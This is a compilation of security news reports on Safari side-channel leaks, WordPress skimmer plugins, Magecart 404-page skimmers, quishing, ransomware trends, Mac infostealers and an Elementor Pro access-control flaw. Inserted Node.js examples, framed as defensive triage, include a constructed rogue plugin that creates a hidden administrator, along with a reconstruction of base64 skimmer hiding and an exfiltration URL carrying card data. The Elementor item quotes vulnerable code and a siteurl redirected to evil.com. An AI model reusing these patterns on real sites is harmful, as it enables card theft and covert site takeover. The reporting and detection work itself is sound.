Hackers can force iOS and macOS browsers to divulge passwords and much more

iLeakage is practical and requires minimal resources. A patch isn’t (yet) available.

Researchers have devised an attack that forces Apple’s Safari browser to divulge passwords, Gmail message content, and other secrets by exploiting a side channel vulnerability in the A- and M-series CPUs running modern iOS and macOS devices.

iLeakage, as the academic researchers have named the attack, is practical and requires minimal resources to carry out. It does, however, require extensive reverse-engineering of Apple hardware and significant expertise in exploiting a class of vulnerability known as a side channel, which leaks secrets based on clues left in electromagnetic emanations, data caches, or other manifestations of a targeted system. The side channel in this case is built on speculative execution, a performance-enhancement feature found in modern CPUs that has formed the basis of a wide corpus of attacks in recent years. The nearly endless stream of exploit variants has left chip makers, primarily Intel and, to a lesser extent, AMD, scrambling to devise mitigations.

Exploiting WebKit on Apple silicon

The researchers implement iLeakage as a website. When visited by a vulnerable macOS or iOS device, the website uses JavaScript to surreptitiously open a separate website of the attacker’s choice and recover site content rendered in a pop-up window. The researchers have successfully leveraged iLeakage to recover YouTube viewing history, the content of a Gmail inbox—when a target is logged in—and a password as it’s being autofilled by a credential manager. (In an email sent five days after this post went live, a Google representative pointed out the obvious: the leakage is the result of the side-channel and WebKit behavior and Gmail is simply a hypothetical downstream target. There are no indications iLeakage has been exploited in the wild.)

Once visited, the iLeakage site requires about five minutes to profile the target machine and, on average, roughly another 30 seconds to extract a 512-bit secret, such as a 64-character string.

“We show how an attacker can induce Safari to render an arbitrary webpage, subsequently recovering sensitive information present within it using speculative execution,” the researchers wrote on an informational website. “In particular, we demonstrate how Safari allows a malicious webpage to recover secrets from popular high-value targets, such as Gmail inbox content. Finally, we demonstrate the recovery of passwords, in case these are autofilled by credential managers.”

Top: Google’s accounts page autofilled by password manager, where the password is googlepassword. Bottom: Leaked page data with credentials highlighted. (Image: Kim et al.)

While iLeakage works against Macs only when running Safari, iPhones and iPads can be attacked when running any browser because they’re all based on Apple’s WebKit browser engine. An Apple representative said iLeakage advances the company’s understanding and that the company is aware of the vulnerability and plans to address it in an upcoming software release. There is no CVE designation to track the vulnerability.

Unique WebKit attributes are one crucial ingredient in the attack. The design of A-series and M-series silicon—the first generation of Apple-designed CPUs for iOS and macOS devices respectively—is the other. Both chips contain defenses meant to protect against speculative execution attacks. Weaknesses in the way those protections are implemented ultimately allowed iLeakage to prevail over them.

Source and more details: Hackers can force iOS and macOS browsers to divulge passwords and much more | Ars Technica

Rogue WordPress Plugin Exposes E-Commerce Sites to Credit Card Theft

Threat hunters have discovered a rogue WordPress plugin that’s capable of creating bogus administrator users and injecting malicious JavaScript code to steal credit card information.

The skimming activity is part of a Magecart campaign targeting e-commerce websites, according to Sucuri.

“As with many other malicious or fake WordPress plugins it contains some deceptive information at the top of the file to give it a veneer of legitimacy,” security researcher Ben Martin said. “In this case, comments claim the code to be ‘WordPress Cache Addons.'”

Malicious plugins typically find their way to WordPress sites via either a compromised admin user or the exploitation of security flaws in another plugin already installed on the site.

Post installation, the plugin replicates itself to the mu-plugins (or must-use plugins) directory so that it’s automatically enabled and conceals its presence from the admin panel.

“Since the only way to remove any of the mu-plugins is by manually removing the file, the malware goes out of its way to prevent this,” Martin explained. “The malware accomplishes this by unregistering callback functions for hooks that plugins like this normally use.”

The fraudulent plugin also comes with an option to create an administrator account and hide it from the legitimate site administrator, avoiding red flags and keeping access to the target for an extended period.

The ultimate objective of the campaign is to inject credit card stealing malware in the checkout pages and exfiltrate the information to an actor-controlled domain.

“Since many WordPress infections occur from compromised wp-admin administrator users, it only stands to reason that they’ve needed to work within the constraints of the access levels that they have, and installing plugins is certainly one of the key abilities that WordPress admins possess,” Martin said.
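The behaviours Sucuri describes above (a header comment that mimics a real plugin, a copy of itself dropped into mu-plugins, removal of hook callbacks, and a quietly created administrator) can be turned into a quick static triage check. The following Node.js script is an added example, not Sucuri’s code and not the malware; it scans PHP source passed in as a string for those indicators. The WordPress function and hook names it looks for (wp_insert_user, set_role, remove_action, remove_filter, pre_user_query, all_plugins, pre_current_active_plugins) are real WordPress APIs, but which of them this particular malware touches is not stated in the report, so the indicator list, the scoring and both sample plugin sources are assumptions constructed for illustration.

```javascript
// Added example: static triage of a suspect WordPress plugin file.
// Not Sucuri's code. Indicators mirror the behaviour described in the
// report; the exact patterns, scoring and sample sources are constructed.

const INDICATORS = [
  // Header comment claiming to be a cache add-on (the report cites "WordPress Cache Addons").
  { id: 'fake-header', re: /Plugin Name:\s*.*Cache Addons/i,
    why: 'header claims to be a cache add-on' },
  // Copies itself into wp-content/mu-plugins so WordPress auto-loads it.
  { id: 'mu-plugin-copy', re: /\b(copy|rename|file_put_contents)\s*\([^;]*mu-plugins/i,
    why: 'writes a file into the must-use plugins directory' },
  // Creates a user or grants the administrator role.
  { id: 'admin-user', re: /\bwp_(insert|create)_user\s*\(|set_role\s*\(\s*['"]administrator['"]/i,
    why: 'creates a user or assigns the administrator role' },
  // Strips callbacks from hooks that other plugins use to expose or remove it.
  { id: 'hook-removal', re: /\bremove_(action|filter)\s*\(/i,
    why: 'unregisters hook callbacks' },
  // Hooks commonly abused to hide users or plugins from wp-admin listings (assumed).
  { id: 'hide-from-admin', re: /\b(pre_user_query|all_plugins|pre_current_active_plugins)\b/i,
    why: 'filters the admin list of users or plugins' },
  // Decoded or evaluated payloads.
  { id: 'obfuscation', re: /\b(base64_decode|eval|gzinflate|str_rot13)\s*\(/i,
    why: 'decodes or evaluates hidden code' },
];

function scanPluginSource(src) {
  const hits = [];
  for (const ind of INDICATORS) {
    const m = src.match(ind.re);
    if (m) {
      // Line number of the first match, to speed up manual review.
      const line = src.slice(0, m.index).split('\n').length;
      hits.push({ id: ind.id, line, why: ind.why });
    }
  }
  // Assumed scoring: creating an admin or removing hooks is decisive on its own;
  // otherwise require two weaker indicators before flagging the file.
  const decisive = hits.some(h => h.id === 'admin-user' || h.id === 'hook-removal');
  return { suspicious: decisive || hits.length >= 2, hits };
}

// Constructed sample loosely modelled on the behaviour described in the report.
const SAMPLE_ROGUE_PLUGIN = `<?php
/*
Plugin Name: WordPress Cache Addons
Description: Improves caching performance.
*/
add_action('init', function () {
    // Re-install as a must-use plugin so it loads on every request.
    copy(__FILE__, WP_CONTENT_DIR . '/mu-plugins/cache-addons.php');
    if (!username_exists('wpcacheadmin')) {
        wp_insert_user(['user_login' => 'wpcacheadmin', 'user_pass' => 'x', 'role' => 'administrator']);
    }
    remove_action('admin_notices', 'security_plugin_warning');
    add_action('pre_user_query', 'hide_cache_admin');
});
`;

// Constructed benign plugin for comparison.
const SAMPLE_BENIGN_PLUGIN = `<?php
/*
Plugin Name: Simple Footer Note
*/
add_filter('the_content', function ($c) { return $c . '<p>Thanks for reading.</p>'; });
`;

console.log(scanPluginSource(SAMPLE_ROGUE_PLUGIN));
console.log(scanPluginSource(SAMPLE_BENIGN_PLUGIN));
```

Run it against every file under wp-content/plugins and wp-content/mu-plugins; anything flagged still needs a human read, since legitimate security and caching plugins also call remove_action and write into mu-plugins.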

The disclosure arrives weeks after the WordPress security community warned of a phishing campaign that warns users of an unrelated security flaw and tricks them into installing a plugin under the guise of a patch. The plugin, for its part, creates an admin user and deploys a web shell for persistent remote access.

Sucuri said that the threat actors behind the campaign are leveraging the “RESERVED” status associated with a CVE identifier, which is shown when an identifier has been reserved for use by a CVE Numbering Authority (CNA) or security researcher but the details have yet to be filled in.

Source and more details: https://thehackernews.com/2023/12/rogue-wordpress-plugin-exposes-e.html

Hackers modify online stores’ 404 pages to steal credit cards

A new Magecart card-skimming campaign hijacks the 404 error pages of online retailers’ websites, hiding malicious code there to steal customers’ credit card information.

This technique is one of three variants observed by researchers at the Akamai Security Intelligence Group; the other two conceal the code in an HTML image tag’s ‘onerror’ attribute and in an image binary, with the loader dressed up to look like the Meta Pixel code snippet.

Akamai says the campaign focuses on Magento and WooCommerce sites, with some victims linked to renowned organizations in the food and retail sectors.

Manipulating 404 pages
All websites feature 404 error pages that are displayed to visitors when accessing a webpage that does not exist, has been moved, or has a dead/broken link.

The Magecart actors leverage the default ‘404 Not Found’ page to hide and load the malicious card-stealing code, a technique not seen in previous campaigns.

“This concealment technique is highly innovative and something we haven’t seen in previous Magecart campaigns,” reads Akamai’s report.

“The idea of manipulating the default 404 error page of a targeted website can offer Magecart actors various creative options for improved hiding and evasion.”

The skimmer loader either disguises itself as a Meta Pixel code snippet or hides within random inline scripts already present on the compromised checkout web page.

The loader initiates a fetch request to a relative path named ‘icons,’ but as this path does not exist on the website, the request results in a “404 Not Found” error.

Akamai’s investigators initially assumed the skimmer was no longer active or the Magecart group had made a configuration mistake. However, upon closer inspection, they found that the loader contained a regular expression match searching for a specific string in the returned HTML of the 404 page.

Upon locating the string on the page, Akamai found a concatenated base64-encoded string concealed in an HTML comment. Decoding that string revealed the JavaScript skimmer, which is served on every 404 page of the site.

“We simulated additional requests to nonexistent paths, and all of them returned the same 404 error page containing the comment with the encoded malicious code,” explains Akamai.

“These checks confirm that the attacker successfully altered the default error page for the entire website and concealed the malicious code within it!”

Because the request is made to a first-party path, most security tools monitoring suspicious network requests on the checkout page would overlook it.

Stealing the data
The skimmer code displays a fake form that the website visitors are expected to fill out with sensitive details, including their credit card number, expiration date, and security code.

Once this data is entered on the bogus form, the victim gets a fake “session timeout” error.

In the background, all information is base64-encoded and sent to the attacker via an image request URL carrying the string as a query parameter.

This approach helps evade detection by network traffic monitoring tools, as the request looks like a benign image fetch event. However, decoding the base64 string reveals personal and credit card information.
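To make the two parsing steps above concrete, here is an added Node.js example that is not Akamai’s code and not the skimmer itself. It reproduces what a responder needs when reviewing a compromised store: pulling the base64 payload out of the comment on a 404 page (the same match-and-decode the loader performs), a marker-agnostic scan for any long base64 blob hidden in an HTML comment, and decoding the base64 query parameter carried on the fake image request. The 404 body, the marker string COOKIE_ANNOT, the query parameter name, the JSON layout of the stolen fields and the card values are all constructed for illustration; real campaigns use their own markers and encodings.

```javascript
// Added example (Node.js): recover the hidden payloads described in the
// Akamai write-up. Not the skimmer's code; all sample data is constructed.

// Assumed marker that the loader's regular expression looks for in the 404 body.
const MARKER = 'COOKIE_ANNOT';
// Stand-in for the skimmer; a real payload is the full card-stealing script.
const PAYLOAD_JS = 'document.addEventListener("submit", function (e) { /* skimmer */ });';

// Constructed 404 page: the site's own error page with the attacker's comment appended.
const SAMPLE_404 = [
  '<!DOCTYPE html><html><head><title>404 Not Found</title></head>',
  '<body><h1>Not Found</h1><p>The requested URL was not found on this server.</p>',
  '<!-- ' + MARKER + ':' + Buffer.from(PAYLOAD_JS).toString('base64') + ' -->',
  '</body></html>',
].join('\n');

// Mirror of the loader: regex for the marker, take the base64 that follows it
// inside the HTML comment, decode it. Returns null when no payload is present.
function extractHiddenScript(html, marker) {
  const re = new RegExp('<!--\\s*' + marker + ':([A-Za-z0-9+/=]+)\\s*-->');
  const m = html.match(re);
  if (!m) return null;
  return Buffer.from(m[1], 'base64').toString('utf8');
}

// Defensive scan that does not depend on knowing the marker: report any HTML
// comment carrying a base64-looking run of at least minLen characters
// (threshold is an assumption; tune it against the site's real error page).
function findSuspiciousComments(html, minLen = 64) {
  const out = [];
  const commentRe = /<!--([\s\S]*?)-->/g;
  let c;
  while ((c = commentRe.exec(html)) !== null) {
    const blobs = c[1].match(/[A-Za-z0-9+/]{64,}={0,2}/g) || [];
    for (const b of blobs) if (b.length >= minLen) out.push(b);
  }
  return out;
}

// Decode the exfil request: the stolen fields are base64-encoded and placed in
// a query parameter of an image URL so the request looks like an image fetch.
// The JSON layout of the fields is an assumption for this example.
function decodeExfilUrl(url, param = 'data') {
  const u = new URL(url);
  const raw = u.searchParams.get(param);
  if (!raw) return null;
  // searchParams turns a literal '+' into a space; restore it for base64.
  const b64 = raw.replace(/ /g, '+');
  return JSON.parse(Buffer.from(b64, 'base64').toString('utf8'));
}

// Constructed exfil URL as the skimmer would build it (card number is a test value).
const STOLEN = { cc: '4111111111111111', exp: '12/27', cvv: '123' };
const SAMPLE_EXFIL_URL = 'https://cdn.example.invalid/pixel.gif?data=' +
  encodeURIComponent(Buffer.from(JSON.stringify(STOLEN)).toString('base64'));

console.log(extractHiddenScript(SAMPLE_404, MARKER));
console.log(findSuspiciousComments(SAMPLE_404).length, 'suspicious comment(s)');
console.log(decodeExfilUrl(SAMPLE_EXFIL_URL));
```

When reviewing a live store, fetch a handful of deliberately nonexistent paths (as Akamai did) and run findSuspiciousComments over each body; the skimmer is present if every response carries the same encoded comment. For proxy or CDN logs, apply decodeExfilUrl to image requests whose query strings are unusually long.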

The case of manipulating 404 pages highlights the evolving tactics and versatility of Magecart actors, who continually make it harder for webmasters to locate their malicious code on compromised websites and sanitize them.

Source and more details: https://www.bleepingcomputer.com/news/security/hackers-modify-online-stores-404-pages-to-steal-credit-cards/

Quishing is the new phishing, experts warn – here’s how not to get hooked

Experts are warning of the latest cyber threat to smartphone users – quishing.

Quishing uses the humble QR code to carry out a phishing attack, usually either to trick people into revealing sensitive information or infecting devices with malware.

In 2019, the QR code – short for quick response – was all but extinct. Invented in 1994 to track vehicles during manufacturing in Japan, they had slowly spread across the globe and were expected to take off in an increasingly digital world.

However, even after Apple gave the iPhone a QR code scanner in 2017 they were still far from ubiquitous – until Covid arrived, and suddenly we were scanning them left, right and centre to prove we were virus-free or get into restaurants.

With the habit still strong and QRs everywhere from loyalty cards to adverts on the bus, cyber criminals are jumping on the bandwagon.

‘Everyone with a smartphone happily scans a QR code, whether that be at a restaurant or museum or even to tip buskers on the street,’ said quishing expert Tim Callan, chief experience officer at technology firm Sectigo. ‘While QR codes do have their benefit, their rising popularity means they have also entered into the cybercriminals’ arsenal of weapons. 

‘It is worryingly easy for bad actors to falsify links and addresses. A bad QR code could infect your device or make you click on a link to a dangerous website.’

To avoid falling for a quishing scam, Mr Callan recommends avoiding QRs you can’t fully trust.

‘To avoid quishing scams users shouldn’t scan any QR codes where you cannot easily verify the identity of the end user,’ he said. ‘Think carefully before scanning QR codes in public places, such as for promotional posters, stickers and adverts. Consider instead looking up the organisation directly through a secure browser. 

‘Treat what you see in sites you access through unsolicited QR codes with a grain of salt, and be very careful about installing software or sharing information on the sites they link to.’

However, it is not just QR codes in public places that cannot be trusted. Scammers can also send them straight to your inbox, and because the link is embedded in an image rather than written as text, email filters that scan for known malicious URLs may not see it.

‘This innovative approach serves as a warning sign to organisations as well as the general public, reminding us of the importance of staying vigilant and informed in the face of emerging cyber threats,’ said Raluca Saceanu, CEO of Smarttech247.

‘The modus operandi of [a recent major] attack involves phishing emails posing as urgent Microsoft 365 account updates. These quishing emails feature PNG or PDF attachments containing QR codes, which recipients are prompted to scan to purportedly verify their accounts within a tight timeframe of 2-3 days. 

‘The clever use of QR codes embedded in images enabled attackers to bypass email security scans for known malicious links, ultimately reaching the target’s inbox.’

Ms Saceanu warns anyone who receives a QR code via email to be cautious, especially if the message stresses urgency. Cyber criminals often succeed by generating a sense of panic in their victims, so people act quickly without checking.

She adds to always verify the source of the email: even though at first glance it may appear legitimate, cyber criminals can easily spoof email addresses. Look at the address itself, not just the name of the sender. Even if that appears believable, a quick search of the address may highlight anything untoward. Compare the style of the email address given with those you have previously received from the company or can see online. 

For example, the courier Evri – formerly Hermes – makes clear on its website any contact from its UK arm will come from addresses ending @evri.com, @hermes-europe.co.uk or @myhermes.co.uk, but a recent scam warning of an unsuccessful package delivery came from shipping@hermescourierexpress.com. 

However, while cyber criminals are trying to use smartphones as a vehicle to personal information, your device is also a line of defence.

‘Your smartphone can be your ally in this battle,’ said Ms Saceanu. ‘Most QR code scanners will prompt you to confirm the destination URL before opening a browser, adding an extra layer of security. 

‘Keep your smartphone’s operating system and apps up to date to ensure you have the latest security patches.’

And remember. Check, then double-check. Be sure you know what you’re clicking on before hitting the button.

Source: Quishing is the new phishing, experts warn – here’s how to stay safe | Tech News | Metro News

RANSOMWARE DWELL TIME HITS LOW OF 24 HOURS

Analysis from Secureworks annual State of The Threat Report shows ransomware median dwell time has dropped from 4.5 days to less than 24 hours in a year

Atlanta, GA, October 5, 2023: Ransomware is being deployed within one day of initial access in more than 50% of engagements, says Secureworks® (NASDAQ: SCWX) Counter Threat Unit™ (CTU™). In just 12 months the median dwell time identified in the annual Secureworks State of the Threat Report has freefallen from 4.5 days to less than one day. In 10% of cases, ransomware was even deployed within five hours of initial access.

“The driver for the reduction in median dwell time is likely due to the cybercriminals’ desire for a lower chance of detection. The cybersecurity industry has become much more adept at detecting activity that is a precursor to ransomware. As a result, threat actors are focusing on simpler and quicker to implement operations, rather than big, multi-site enterprise-wide encryption events that are significantly more complex. But the risk from those attacks is still high,” said Don Smith, VP Threat Intelligence, Secureworks Counter Threat Unit.

“While we still see familiar names as the most active threat actors, the emergence of several new and very active threat groups is fuelling a significant rise in victim and data leaks. Despite high profile takedowns and sanctions, cybercriminals are masters of adaptation, and so the threat continues to gather pace,” Smith continued.

The annual State of the Threat report examines the cybersecurity landscape from June 2022 to July 2023. Key findings include:

  • While some familiar names including GOLD MYSTIC (LockBit), GOLD BLAZER (BlackCat/ALPHV), and GOLD TAHOE (Cl0p) still dominate the ransomware landscape, new groups are emerging and listing significant victim counts on “name and shame” leak sites. The past four months of this reporting period have been the most prolific for victim numbers since name-and-shame attacks started in 2019.
  • The three largest initial access vectors (IAV) observed in ransomware engagements where customers engaged Secureworks incident responders were: scan-and-exploit, stolen credentials and commodity malware via phishing emails.
  • Exploitation of known vulnerabilities from 2022 and earlier continued and accounted for more than half of the most exploited vulnerabilities during the report period.

Most Active Ransomware Groups

The same threat groups continued to dominate in 2023 as in 2022. GOLD MYSTIC’s LockBit remains the head of the pack, with nearly three times the number of victims as the next most active group, BlackCat, operated by GOLD BLAZER.

New schemes have also emerged and posted numerous victims. MalasLocker, 8BASE and Akira (which ranked at number 14) are all newcomers that made an impact from Q2 2023. 8BASE listed nearly 40 victims on its leak site in June 2023, only slightly fewer than LockBit. Analysis shows that some of the victims go back as far as mid 2022, although they were dumped at the same time. MalasLocker’s attack on Zimbra servers from the end of April 2023 accounted for 171 victims on its leak site in May. The report examines what leak site activity actually reveals about ransomware attack success rates — it’s not as straightforward as it seems.

The report also reveals that victim numbers per month from April-July 2023 were the most prolific since name and shame emerged in 2019. The highest number of monthly victims ever was posted to leak sites in May 2023 with 600 victims, three times as many as in May 2022.

Top Initial Access Vectors for Ransomware

The three largest initial access vectors (IAV) observed in ransomware engagements where customers engaged Secureworks incident responders were: scan-and-exploit (32%), stolen credentials (32%) and commodity malware via phishing emails (14%).

Scan-and-exploit involves the identification of vulnerable systems, potentially via a search engine like Shodan or a vulnerability scanner, and then attempting to compromise them with a specific exploit. Within the top 12 most commonly exploited vulnerabilities, 58% have CVE dates of earlier than 2022. One (CVE-2018-13379) also made the top 15 most routinely exploited list in 2021 and 2020.

“Despite much hype around ChatGPT and AI style attacks, the two highest profile attacks of 2023 thus far were the result of unpatched infrastructure. At the end of the day, cybercriminals are reaping the rewards from tried and tested methods of attack, so organizations must focus on protecting themselves with basic cyber hygiene and not get caught up in hype,” Smith continued.

The World of Nation-State Attackers

The report also examines the significant activities and trends in the behavior of state-sponsored threat groups belonging to China, Russia, Iran, and North Korea. Geopolitics remains the primary driver for state-sponsored threat groups across the board.

China:

China has shifted part of its attention to Eastern Europe, while also maintaining a focus on Taiwan and other near neighbors. It displays a growing emphasis on stealthy tradecraft in cyberespionage attacks — a change from its previous “smash-and-grab” reputation. The use of commercial tools like Cobalt Strike, as well as Chinese open-source tooling, minimizes risk of attribution and blends with activity from post-intrusion ransomware groups.

Iran:

Iran remains focused on dissident activity, on hindering progress on the Abraham Accords, and on Western intentions towards renegotiations of nuclear accords. Iran’s main intelligence services, the Ministry of Intelligence and Security (MOIS or VAJA) and the Islamic Revolutionary Guard Corps (IRGC), both use a network of contractors to support offensive cyber strategies. The use of personas (impersonating real people or invented ones) is a key tactic across Iranian threat groups.

Russia:

The war in Ukraine remained the focus for Russian activity, which falls into two camps: cyberespionage and disruption. This year has seen an increase in the number of patriotic-minded cyber groups targeting organizations considered adversaries of Russia. For these gangs, Telegram is the social media/messaging platform of choice for recruitment, targeting and celebrations of success. The malicious use of trusted third-party cloud services is frequently incorporated into Russian threat group operations.

North Korea:

North Korean threat groups fall into two categories: cyber espionage and revenue generation for the isolated regime. AppleJeus has been a fundamental tool for North Korea’s financial theft initiatives, and according to Elliptic, North Korean threat groups stole $2.3 billion USD in crypto assets between May 2017 and May 2023 (30% of this from Japan).

State of the Threat Report 2023

This latest State of the Threat Report is the seventh annual report from Secureworks providing a concise analysis of how the global cybersecurity threat landscape has evolved over the last 12 months. The information within the report is drawn from the Secureworks Counter Threat Unit’s (CTU) firsthand observations of threat actor tooling and behaviors and includes real-life incidents. Our annual threat analysis provides a deep-dive insight into the threats our team has observed on the front line of cybersecurity.

The Secureworks State of the Threat Report can be read in full here: https://www.secureworks.com/resources/rp-state-of-the-threat-2023

Source: https://www.secureworks.com/about/press/ransomware-dwell-time-hits-low-of-24-hours

WordPress Plugin WP-UserOnline 2.88.0 – Stored Cross Site Scripting (XSS)

Technical Description:
The WP-UserOnline plugin for WordPress has multiple Stored Cross-Site Scripting vulnerabilities in versions up to, and including, 2.88.0. This is due to the fact that all fields in the “Naming Conventions” section do not properly sanitize user input, nor escape it on output. This makes it possible for authenticated attackers, with administrative privileges, to inject JavaScript code into the setting that will execute whenever a user accesses the injected page.

Source: https://www.exploit-db.com/exploits/51020

Massive Targeted Exploit Campaign Against WooCommerce Payments Underway

The Wordfence Threat Intelligence team has been monitoring an ongoing exploit campaign targeting a recently disclosed vulnerability in WooCommerce Payments, a plugin installed on over 600,000 sites. Large-scale attacks against the vulnerability, assigned CVE-2023-28121, began on Thursday, July 14, 2023 and continued over the weekend, peaking at 1.3 million attacks against 157,000 sites on Saturday, July 16, 2023.

The vulnerability allows unauthenticated attackers to obtain administrative privileges on vulnerable websites, earning it a critical CVSS score of 9.8. This makes it an appealing target, and this attack campaign confirms the original coverage of the vulnerability, which predicted large-scale attacks.

All Wordfence users have been protected against this vulnerability since April 22, 2023 via a Firewall rule we developed to block exploit attempts. Versions 4.8.0 – 5.6.1 of the WooCommerce Payments plugin are vulnerable.

The Wordfence Intelligence Dashboard showing attacks against WooCommerce Payments

Readers can continue watching this and other trends on the Wordfence Intelligence dashboard, where it is currently the most heavily-attacked unique WordPress vulnerability.

Unlike many other large-scale campaigns which typically attack millions of sites indiscriminately, this one seems to be targeted against a smaller set of websites. What’s particularly interesting is that we began seeing early warning signs several days before the main wave of attacks – an increase in plugin enumeration requests searching for a readme.txt file in the wp-content/plugins/woocommerce-payments/ directory of millions of sites.

Source and more details: https://www.wordfence.com/blog/2023/07/massive-targeted-exploit-campaign-against-woocommerce-payments-underway/

New Atomic macOS Malware Steals Keychain Passwords and Crypto Wallets

Threat actors are advertising a new information stealer for the Apple macOS operating system called Atomic macOS Stealer (or AMOS) on Telegram for $1,000 per month, joining the likes of MacStealer.

“The Atomic macOS Stealer can steal various types of information from the victim’s machine, including Keychain passwords, complete system information, files from the desktop and documents folder, and even the macOS password,” Cyble researchers said in a technical report.

Other features include the ability to extract data from web browsers and cryptocurrency wallets such as Atomic, Binance, Coinomi, Electrum, and Exodus. Threat actors who purchase the stealer from its developers are also provided a ready-to-use web panel for managing the victims.

The malware takes the form of an unsigned disk image file (Setup.dmg) that, when executed, urges the victim to enter their system password on a bogus prompt to escalate privileges and carry out its malicious activities — a technique also adopted by MacStealer.

The initial intrusion vector used to deliver the malware is not immediately clear, although it’s possible that users are manipulated into downloading and executing it under the guise of legitimate software.

The Atomic stealer artifact, submitted to VirusTotal on April 24, 2023, also bears the name “Notion-7.0.6.dmg,” suggesting that it’s being propagated as the popular note-taking app. Other samples unearthed by the MalwareHunterTeam have been distributed as “Photoshop CC 2023.dmg” and “Tor Browser.dmg.”

“Malware such as the Atomic macOS Stealer could be installed by exploiting vulnerabilities or hosting on phishing websites,” Cyble noted.

Atomic then proceeds to harvest system metadata, files, the iCloud Keychain, information stored in web browsers (e.g., passwords, autofill, cookies, credit card data) and crypto wallet extensions, all of which are compressed into a ZIP archive and sent to a remote server and to pre-configured Telegram channels.

The development is another sign that macOS is increasingly becoming a lucrative target beyond nation-state hacking groups to deploy stealer malware, making it imperative that users only download and install software from trusted sources, enable two-factor authentication, review app permissions, and refrain from opening suspicious links received via emails or SMS messages.

Second Variant of Atomic Stealer Found

SentinelOne, in a follow-up analysis published earlier this week, disclosed details of a previously unreported second variant of Atomic Stealer and the use of Google Ads as a distribution vector for the malware.

The new version masquerades as a game installer and incorporates a “larger number of functions focusing on Firefox and Chromium browsers” but at the same time leverages game-related lures to target cryptocurrency users.

Additionally, the presence of grammatical and spelling errors is an indication that the developer’s first language is likely not English. The identity of the threat actor behind Atomic Stealer is currently unknown.

Another significant trait of Atomic Stealer is its lack of a persistence mechanism, a choice driven by a macOS Ventura feature that alerts users when new apps or services are added to the list of “login items” that are automatically executed when the device starts. Instead, it opts to steal as much information as possible in a single smash-and-grab run.

“Infostealers targeted at Mac users have become increasingly viable for threat actors now that Macs have reached widespread use in organizations, both for work and personal use,” SentinelOne researcher Phil Stokes said.

“As many Mac devices lack good external security tools that can provide both visibility and protection, there is plenty of opportunity for threat actors to develop and market tools to aid cybercriminals.”

This vicious new malware version is now targeting password managers

A new version of an already active malware family is now shifting focus to target the password managers 1Password and KeePass.

ViperSoftX is an infostealer that has long gone after crypto wallets, but it’s now attacking more of them, in addition to multiple web browsers (not just Google Chrome) and password managers as well. 

It also has stronger code encryption now and is better at avoiding detection from antivirus tools. 

New version

ViperSoftX can install the malicious Chrome extension VenomSoftX, but according to researchers at Trend Micro, it can now also infect Microsoft Edge, Mozilla Firefox, Opera and Brave. 

The malware was first discovered in 2020 stealing crypto currency using a JavaScript-based RAT (remote access trojan). By 2022, however, Avast found that it had advanced considerably in its capabilities, with the cybersecurity vendor claiming that it had stopped close to 100,000 attacks on its customers from the malware through most of last year. Most victims were based in the U.S., Italy, Brazil, and India.

It seems that now, however, ViperSoftX has extended its global reach, with Trend Micro detecting additional prominent activity in Australia, Japan, Taiwan, Malaysia and France. Enterprises and consumers alike are being targeted too. Analysts found that the malware is often hidden in software cracks and activators. 

In addition to attacking many more crypto wallets, the latest version of ViperSoftX has been found by Trend Micro to be scouring for files associated with 1Password and KeePass, and attempting to steal data related to their browser extensions. 

A vulnerability tracked as CVE-2023-24055 (in KeePass) does allow stored passwords to be exported to a plain-text file, but Trend Micro found no evidence that it is being used by ViperSoftX.

However, Trend Micro told BleepingComputer that the malware could steal users’ vaults in the later stages of an attack, once it has taken hold, harvested data from the victim’s system and sent it to the threat actor.

More worryingly, the new ViperSoftX uses DLL sideloading so that it runs under a trusted process and stays undetected by security software. Before it begins its work, it also checks whether virtualization and analysis tools such as VMware and Process Monitor, or antivirus software such as Windows Defender and ESET, are present on the system.

It also uses byte mapping, a technique to encrypt its code in a way that makes it much harder to decrypt without having the correct map to do so.

Source: This vicious new malware version is now targeting password managers | TechRadar

Hackers exploit WordPress plugin flaw that gives full control of millions of sites

Elementor Pro fixed the vulnerability, but not everyone has installed the patch.

Hackers are actively exploiting a critical vulnerability in a widely used WordPress plugin that gives them the ability to take complete control of millions of sites, researchers said.

The vulnerability, which carries a severity rating of 8.8 out of a possible 10, is present in Elementor Pro, a premium plugin running on more than 12 million sites powered by the WordPress content management system. Elementor Pro allows users to build websites with a wide range of tools and integrates with WooCommerce, a separate WordPress plugin. When Elementor Pro and WooCommerce are both active, anyone with an account on the site, say a subscriber or customer, can create new accounts that have full administrator privileges.

The vulnerability was discovered by Jerome Bruandet, a researcher with security firm NinTechNet. Last week, Elementor, the developer of the Elementor Pro plugin, released version 3.11.7, which patched the flaw. In a post published on Tuesday, Bruandet wrote:

An authenticated attacker can leverage the vulnerability to create an administrator account by enabling registration (users_can_register) and setting the default role (default_role) to “administrator”, change the administrator email address (admin_email) or, as shown below, redirect all traffic to an external malicious website by changing siteurl among many other possibilities:

MariaDB [example]> SELECT * FROM `wp_options` WHERE `option_name`='siteurl';
+-----------+-------------+------------------+----------+
| option_id | option_name | option_value     | autoload |
+-----------+-------------+------------------+----------+
|         1 | siteurl     | https://evil.com | yes      |
+-----------+-------------+------------------+----------+
1 row in set (0.001 sec)

Now, researchers with a separate security firm, PatchStack, report that the vulnerability is under active exploitation. Attacks are coming from a variety of IP addresses, including:

  • 193.169.194.63
  • 193.169.195.64
  • 194.135.30.6

Files uploaded to compromised sites often have the following names:

  • wp-resortpack.zip
  • wp-rate.php
  • lll.zip

URLs of compromised sites are often being changed to:

  • away[dot]trackersline[dot]com

The broken access control vulnerability stems from Elementor Pro’s use of the “elementor-pro/modules/woocommerce/module.php” component. When WooCommerce is running, this script registers the following AJAX actions:

/**
 * Register Ajax Actions.
 *
 * Registers ajax action used by the Editor js.
 *
 * @since 3.5.0
 *
 * @param Ajax $ajax
 */
public function register_ajax_actions( Ajax $ajax ) {
   // `woocommerce_update_page_option` is called in the editor save-show-modal.js.
   $ajax->register_ajax_action( 'pro_woocommerce_update_page_option', [ $this, 'update_page_option' ] );
   $ajax->register_ajax_action( 'pro_woocommerce_mock_notices', [ $this, 'woocommerce_mock_notices' ] );
}

and

/**
 * Update Page Option.
 *
 * Ajax action can be used to update any WooCommerce option.
 *
 * @since 3.5.0
 *
 * @param array $data
 */
public function update_page_option( $data ) {
   update_option( $data['option_name'], $data['editor_post_id'] );
}

The update_option function “is supposed to allow the Administrator or the Shop Manager to update some specific WooCommerce options, but user input aren’t validated and the function lacks a capability check to restrict its access to a high privileged user only,” Bruandet explained. He continued:

Elementor uses its own AJAX handler to manage most of its AJAX actions, including pro_woocommerce_update_page_option, with the global elementor_ajax action. It is located in the “elementor/core/common/modules/ajax/module.php” script of the free version (which is required to run Elementor Pro):

/**
 * Handle ajax request.
 *
